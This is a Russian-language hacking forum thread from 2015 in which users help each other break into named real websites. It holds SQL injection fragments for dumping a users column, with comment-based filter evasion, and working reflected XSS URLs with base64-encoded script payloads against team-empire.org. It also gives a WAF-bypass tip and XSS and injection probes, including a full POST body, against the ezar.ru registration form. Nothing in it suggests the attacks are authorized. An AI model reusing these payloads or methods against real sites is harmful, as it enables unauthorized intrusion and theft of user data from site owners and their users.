 |
|
15.07.2015, 14:34
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами:
8374164
Репутация:
0
|
|
Сообщение от RedFern.89
↑
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Код:
http://navi-gaming.com/en/achievements?id[]=71
Код:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."
|
|
|
16.07.2015, 09:26
|
|
Новичок
Регистрация: 16.07.2015
Сообщений: 3
С нами:
5699126
Репутация:
0
|
|
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
|
|
|
|
16.07.2015, 14:11
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417383
Репутация:
0
|
|
Сообщение от RedFern.89
↑
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Код:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
Раскрутить не получилось, но XSS получилось.
Код:
xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1hTU1BPU0VELyk=%3E
http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNoYXQucnUnOw==%3E
WAF только на формы, обход через Request_Uri
|
|
|
|
16.07.2015, 14:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Root2
↑
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
если просто в hex? есть вывод?
|
|
|
|
16.07.2015, 17:02
|
|
Новичок
Регистрация: 16.07.2015
Сообщений: 3
С нами:
5699126
Репутация:
0
|
|
Сообщение от yarbabin
↑
если просто в hex? есть вывод?
Нет тоже информация не отоброжается
|
|
|
|
17.07.2015, 22:57
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Root2
↑
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
concat_ws(0x3a,convert(users%20using%20utf8))
А так ?
|
|
|
|
18.07.2015, 09:44
|
|
Новичок
Регистрация: 16.07.2015
Сообщений: 3
С нами:
5699126
Репутация:
0
|
|
Сообщение от kingbeef
↑
concat_ws(0x3a,convert(users%20using%20utf8))
А так ?
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
|
|
|
|
18.07.2015, 14:52
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Root2
↑
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
Покажи ссылку
|
|
|
|
19.07.2015, 00:49
|
|
Новичок
Регистрация: 06.09.2012
Сообщений: 5
С нами:
7201046
Репутация:
0
|
|
Помогите, попал в тупик.
Вот страница - http://www.ezar.ru/?a=reg
Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows()
Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается. |
|
|
|
19.07.2015, 01:21
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417383
Репутация:
0
|
|
Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS:
Код:
1) http://www.ezar.ru/testd.php?domain=ezar.ru&nick=
2) url: http://www.ezar.ru/prereg.php
POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C%2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK
Чтобы не мучится с POST, работайте так:
Код:
http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
